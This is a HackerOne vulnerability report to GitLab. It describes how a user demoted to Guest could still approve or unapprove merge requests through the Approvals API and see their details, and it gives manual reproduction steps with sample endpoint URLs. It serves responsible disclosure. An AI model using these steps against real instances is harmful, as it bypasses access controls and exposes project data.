Revoked User can approve a Merge Request created by him via approve/unapprove API which leads to Merge request info leak

HackerOne report #1198317 by muthu_prakash on 2021-05-15, assigned to GitLab Team:

Report | How To Reproduce

Report

Summary

In Gitlab when a user is demoted to Guest role, the Guest user will not be able to view and edit the Merge requests in a project even if the merge request is created by him. But the Guest user can use the Approvals API to approve/unapprove the merge request even after the User is demoted to Guest. This API also leaks the Merge request details which the guest user is not supposed to view.

Steps to reproduce

• Created a new Project with private access
• Created a new file in master branch (Made some changes )
• Invited a user with a maintainer role.
• From the maintainer role account created a new branch named test, made some changes.
• After that from project admin account I created a Merge request with source branch as test and target branch as master.
• Assigned that merge request to the maintainer role access user.
• After creating the merge request, from project admin account demoted the maintainer role user to Guest role
• From demoted user account I created a personal access token with all the available scopes selected
• Using API client sent a POST request to the approvals endpoint
  Sample endpoint:
  • https://gitlab.com/api/v4/projects/26669301/merge_requests/1/unapprove
  • https://gitlab.com/api/v4/projects/26669301/merge_requests/1/approve
• This API endpoint will respond with 201 status with the merge request details which the Guest user is not supposed to approve and view.

Impact

Demoted users can approve the merge requests created by them and can view the confidential data of those merge requests once their role revoked. This leads to sensitive info disclosure to unauthorised users

What is the current bug behavior?

Demoted users can approve the merge requests created by them and can view the confidential data of those merge requests once their role is revoked

What is the expected correct behavior?

Demoted users should be blocked from approving the merge requests created by them and viewing the confidential data of those merge requests once their role is revoked

Output of checks

This bug happens on GitLab.com

Impact

Demoted users can approve the merge requests created by them and can view the confidential data of those merge requests once their role revoked. This leads to sensitive info disclosure to unauthorised users

How To Reproduce

Please add reproducibility information to this section: